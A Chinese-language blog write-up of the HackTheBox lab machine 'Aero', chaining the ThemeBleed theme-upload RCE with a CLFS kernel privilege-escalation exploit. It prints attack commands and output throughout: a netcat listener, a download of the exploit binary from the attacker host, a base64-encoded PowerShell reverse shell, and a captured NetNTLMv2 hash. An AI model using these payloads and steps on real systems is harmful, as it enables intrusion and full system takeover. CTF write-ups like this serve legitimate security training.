Aero:通过主题上传实现 Windows RCE 与 CLFS 本地提权复盘(CVE-2023-28252)

# 技术博文 # HTB # CVE利用

首先使用nmap扫描存活的端口

nmap -p- --min-rate 10000 10.10.11.237
Starting Nmap 7.80 ( https://nmap.org ) at 2023-09-26 22:58 EDT
Nmap scan report for 10.10.11.237
Host is up (0.092s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

发现了80端口,让我们扫描具体的服务

nmap -p 80 -sCV 10.10.11.237
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Aero Theme Hub
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.17 seconds

根据IIS版本,主机可能运行现代Windows操作系统(Windows 10/11或Server 2016+)。
Pasted image 20251017200844.png
访问该网站发现是一个 Windows 11 主题的存储库
Pasted image 20251017201025.png
底部拥有一个上传点来上传自定义主题

“浏览”按钮为文件对话框打开.theme而且.themepack扩展。如果我尝试上传一张图片,它会根据文件扩展名(或者说明)来拒绝它:File upload failed. Invalid file extension.

接着我们来制作一个虚拟test.theme文件来进行上传
上传成功并显示:File upload succeeded, Once we test your theme it will be added to the site!
说明后续还会有人来打开测试它

底部有一封邮件,support@aerohub.htb。页面上的所有链接都指向同一页面的其他部分。

我们来查看http响应头来判断IIS的版本

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Set-Cookie: .AspNetCore.Antiforgery.SV5HtsIgkxc=CfDJ8KhwwGdRThZIsdKv2UEKBTSKcK6NYPd906TegwfWvC5IvpQ6t9cvvVGbGBjIdz6FTU-kOje59n9YpR8Q0CZtkfoJtfs2njXhJ_fDAJGYcVimZ-11D2WAdnNEB1nTRyfLh3gTNQxTVeUrG5h-tdWSJ8c; path=/; samesite=strict; httponly
X-Frame-Options: SAMEORIGIN
X-Powered-By: ARR/3.0
Date: Tue, 26 Sep 2023 12:09:15 GMT
Connection: close
Content-Length: 11650

X-Powered-By关于ARR/3.0与更常见的不同ASP.NETApplication Request Routing申请流程是用于处理负载均衡的 IIS 扩展。

现在我们不知道这个扩展页面的扩展

我会跑feroxbuster针对该网站,将其作为小写词列表,因为IIS对爆破事件不敏感:

┌──(root㉿kali)-[~]
└─# feroxbuster -u http://10.10.11.237 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt 

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.9.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.11.237
 🚀  Threads               │ 50
 📖  Wordlist              │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.9.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        0l        0w        0c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      186l      870w    11650c http://10.10.11.237/
200      GET      186l      870w    11650c http://10.10.11.237/home
400      GET        6l       26w      324c http://10.10.11.237/error%1F_log
[####################] - 1m     26584/26584   0s      found:3       errors:0
[####################] - 1m     26584/26584   366/s   http://10.10.11.237/

我们可以发现它从/home以主页的形式来进行加载
接着我们需要查找关于微软主题站的可利用漏洞
搜索关键词:Windows 11主题利用,windows 11 theme exploit
通过搜索,我们发现了一个可利用的CVE漏洞

CVE漏洞详细描述:
CVE-2023-38146,即“ThemeBleed”,是 Windows 主题中的一个漏洞,允许远程执行代码。[September 2023 Patch Tuesday](https://www.bleepingcomputer.com/news/microsoft/microsoft-september-2023-patch-tuesday-fixes-2-zero-days-59-flaws/)补丁于2023年9月的星期二进行了补丁。

此漏洞来自 Windows 处理方式`.msstyles`从主题文件中引用的文件。这些`.msstyles`文件导致Windows在与该路径相同的路径上打开一个DLL`.msstyles`路径与`_vrf.dll`附后。此文件上的数字签名在加载前需检查。

漏洞出现是因为,当使用 999 版本时,时间之间会有很大差距`_vrf.dll`二进制文件的签名将被检查,何时加载以供使用。此间隙显示一个竞速状态,攻击者可将经过验证的DLL样式替换为恶意有效载荷,以运行任意代码。

我们接着来寻找可利用的POC:
研究人员发布的概念验证代码已出现在此 GitHub 仓库中。Releases在“发布”部分中,有一个压缩文件,其中包含一个Windows可执行文件以及命名的DLLstage1,stage2并且stage3:

┌──(root㉿kali)-[~]
└─# find . -type f -exec file {} \;
./SMBLibrary.Win32.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
./ThemeBleed.pdb: MSVC program database ver 7.00, 512*95 bytes
./ThemeBleed.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
./SMBLibrary.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
./data/stage_3: PE32+ executable (DLL) (console) x86-64, for MS Windows
./data/stage_1: PE32+ executable (DLL) (console) x86-64, for MS Windows
./data/stage_2: PE32+ executable (DLL) (console) x86-64, for MS Windows

GitHub 上的 README 显示,该工具有三条命令:

  • server- 运行服务器
  • make_theme制作一个.theme文件
  • make_themepack制作一个.themepack文件
    stage1msstyles文件PACHTHEME_VERSION设置为 999。stage2是一个合法签名样式文件,stage3是要加载的 DLL,默认情况下会启动calc.exe

这个工具的主要要点是:

  • 主题会尝试从主机上的 SMB 共享中加载样式文件。
  • 这会触发与文件结尾的交互_vrf.dll首先用CreateFileAPI 读取它并验证其签名,然后打开它LoadLibraryAPI。
  • SMB服务器利用其打开方式的不同,以返回合法的DLL或恶意的DLL。
python3 themebleed.py -r 10.10.14.9 -p 9999
2025-10-17 13:39:09,543 INFO> ThemeBleed CVE-2023-38146 PoC [https://github.com/Jnnshschl]
2025-10-17 13:39:09,543 INFO> Credits to -> https://github.com/gabe-k/themebleed, impacket and cabarchive

2025-10-17 13:39:11,087 INFO> Theme generated: "evil_theme.theme"
2025-10-17 13:39:11,087 INFO> Themepack generated: "evil_theme.themepack"

2025-10-17 13:39:11,087 INFO> Remember to start netcat: rlwrap -cAr nc -lvnp 9999
2025-10-17 13:39:11,087 INFO> Starting SMB server: 10.10.14.9:445

2025-10-17 13:39:11,087 INFO> Config file parsed
2025-10-17 13:39:11,087 INFO> Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
2025-10-18 13:39:11,088 INFO> Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
2025-10-17 13:39:11,088 INFO> Config file parsed
2025-10-17 13:39:11,088 INFO> Config file parsed

我们还在9999端口开始收听。现在我们上传“evil_theme.theme”文件,希望能从机器上获得回调

上传文件后,我们发现有关于这些文件的请求

2025-10-17 15:08:44,932 INFO> Incoming connection (10.129.222.250,50623)
2025-10-17 15:08:45,294 INFO> AUTHENTICATE_MESSAGE (AERO\sam.emerson,AERO)
2025-10-17 15:08:45,294 INFO> User AERO\sam.emerson authenticated successfully
2025-10-17 15:08:45,294 INFO> sam.emerson::AERO:aaaaaaaaaaaaaaaa:d5051f01669b6ef1788c0328bd40d9c3:0101000000000000804042cc2ccdda01333ab5323897351d0000000001001000770074006100670055006100640048000300100077007400610067005500610064004800020010004c0079006d0051004500520079004d00040010004c0079006d0051004500520079004d0007000800804042cc2ccdda0106000400020000000800300030000000000000000000000000200000069923f1de1a6c251facaedeb967ea1813524f0afa1d512f7edbd31329d351940a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0039000000000000000000
2025-10-17 15:08:45,466 INFO> Connecting Share(1:IPC$)
2025-10-17 15:08:45,808 INFO> Connecting Share(2:tb)
2025-10-17 15:08:45,981 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2025-10-17 15:08:47,568 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 1]
2025-10-17 15:08:49,116 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 7]
2025-10-17 15:08:49,810 WARNING> Stage 1/3: "Aero.msstyles" [shareAccess: 5]
2025-10-17 15:08:52,242 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2025-10-17 15:08:53,921 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 1]
2025-10-17 15:08:57,449 INFO> Disconnecting Share(1:IPC$)
2025-10-17 15:08:58,837 WARNING> Stage 2/3: "Aero.msstyles_vrf.dll" [shareAccess: 7]
2025-10-17 15:08:59,526 WARNING> Stage 3/3: "Aero.msstyles_vrf.dll" [shareAccess: 5]

现在让我们检查一下我们的反向dll,我们收到了回调

┌──(root㉿kali)-[~]
└─# rlwrap -cAr nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.9] from (UNKNOWN) [10.129.223.36] 50624
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32>

我们成功连接上了主机

PS C:\Users\sam.emerson\Documents> dir
dir

    Directory: C:\Users\sam.emerson\Documents

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         9/21/2023   9:18 AM          14158 CVE-2023-28252_Summary.pdf
-a----         9/26/2023   1:06 PM           1113 watchdog.ps1

gointstor.ps1 文件负责执行我们上传的恶意主题
然后是一个PDF文件。该标题为我们提供了获取管理权限所需漏洞的线索。将文件转换为 base64 来展开
让我们查看文件内容
Pasted image 20251017203732.png
是一个CVE-2023-28252漏洞的介绍
访问报告链接:https://github.com/bkstephen/Compiled-PoC-Binary-For-CVE-2023-28252

我们可以使用Python服务器从外置设备上传二进制文件,然后以下方式下载

PS C:\Users\sam.emerson\Documents> iwr http://10.10.14.9:9797/clfs_eop.exe -outfile clfs_eop.exe

我们传递一个命令来执行,因此我传递了一个 PowerPoint Base64 编码的反向 shell。(端口 9988)

PS C:\Users\sam.emerson\Documents> .\clfs_eop.exe "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwAOQA5ADgAOAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
.\clfs_eop.exe "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAiACwAOQA5ADgAOAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="
[+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10

ARGUMENTS
[+] TOKEN OFFSET 4b8
[+] FLAG 1

VIRTUAL ADDRESSES AND OFFSETS
[+] NtFsControlFile Address --> 00007FF8F2684240
[+] pool NpAt VirtualAddress -->FFFFE68A3893D000
[+] MY EPROCESSS FFFFBF0AC65E9180
[+] SYSTEM EPROCESSS FFFFBF0AC14CE040
[+] _ETHREAD ADDRESS FFFFBF0AC65EA080
[+] PREVIOUS MODE ADDRESS FFFFBF0AC65EA2B2
[+] Offset ClfsEarlierLsn --------------------------> 0000000000013220
[+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0
[+] Kernel ClfsEarlierLsn --------------------------> FFFFF80029613220
[+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF8002962BFB0
[+] Offset RtlClearBit --------------------------> 0000000000343010
[+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00
[+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0
[+] Kernel RtlClearBit --------------------------> FFFFF80024D43010
[+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF800253C87B0

[+] Kernel PoFxProcessorNotification --------------------------> FFFFF80024DDBD00

PATHS
[+] Folder Public Path = C:\Users\Public
[+] Base log file name path= LOG:C:\Users\Public\20
[+] Base file path = C:\Users\Public\20.blf
[+] Container file name path = C:\Users\Public\.p_20
Last kernel CLFS address = FFFFE68A39D87000
numero de tags CLFS founded 11

Last kernel CLFS address = FFFFE68A3A542000
numero de tags CLFS founded 1

[+] Log file handle: 00000000000000EC
[+] Pool CLFS kernel address: FFFFE68A3A542000

number of pipes created =5000

number of pipes created =4000
TRIGGER START
System_token_value: FFFFE68A33041596
SYSTEM TOKEN CAPTURED
Closing Handle
ACTUAL USER=SYSTEM
#< CLIXML

是的,我们接到回显

┌──(kali㉿kali)-[~/HTB/Aero]
└─$ rlwrap -cAr nc -lvnp 9988
listening on [any] 9988 ...
connect to [10.10.14.9] from (UNKNOWN) [10.129.223.36] 65382
whoami
nt authority\system
PS C:\Users\sam.emerson\Documents>

根用户标识可以在管理员桌面中找到

添加新评论

文章状态:已收录~
STAY VIBRANT

浙ICP备2024114970号-1,浙公网安备33020302001744号

本站总访问量 36141 次

© 2025 BushSEC All rights reserved.
歌曲封面
0:00